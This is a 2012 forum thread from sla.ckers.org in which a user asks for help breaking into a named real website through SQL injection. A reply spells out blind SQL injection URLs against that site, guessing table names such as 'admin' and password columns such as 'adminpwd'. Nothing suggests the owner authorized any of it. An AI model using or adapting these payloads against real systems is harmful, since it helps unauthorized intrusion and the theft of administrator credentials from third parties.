can u help me ?

Cenzic 232 Patent

Paid Advertising

sla.ckers.org is
ha.ckers sla.cking

How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

can u help me ?

Posted by: 0x3a

Date: May 13, 2012 12:44AM

this url:
http://www.xlsoft.com.cn/Product.asp?id=662

tools don't work.

order by 27 >>true
order by 28 >>false

when i use union select ,it doesn't work

can u help me ?

thx!

Options: Reply•Quote

Re: can u help me ?

Posted by: blackrose

Date: June 01, 2012 12:27PM

guess on the tables and columns

Options: Reply•Quote

Re: can u help me ?

Posted by: 0x3a

Date: June 11, 2012 05:49AM

blind?

Options: Reply•Quote

Re: can u help me ?

Posted by: firestorm

Date: September 17, 2012 06:50PM

Hi there , you should keep ur options open ...

Try blind like :
----------
Guess table
------------
http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count(*) FROM [user])
Wont load as user doesnt exist ...

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count(*) FROM [admin])
Loads... admin table is there

and so on ....
-------
Guess column name
--------
http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([id]) FROM [admin])
TRUE

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([password]) FROM [admin])
False

http://www.xlsoft.com.cn/Product.asp?id=662 and 0<=(SELECT count([adminpwd]) FROM [admin])
True

and so on.....

Being a pentester I get to see and use strange things like coldfusion, sybase bla bla..... gotta be ready with everything..

Regards

Options: Reply•Quote

Re: can u help me ?

Posted by: 0x3a

Date: October 30, 2012 10:42AM

Thx

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login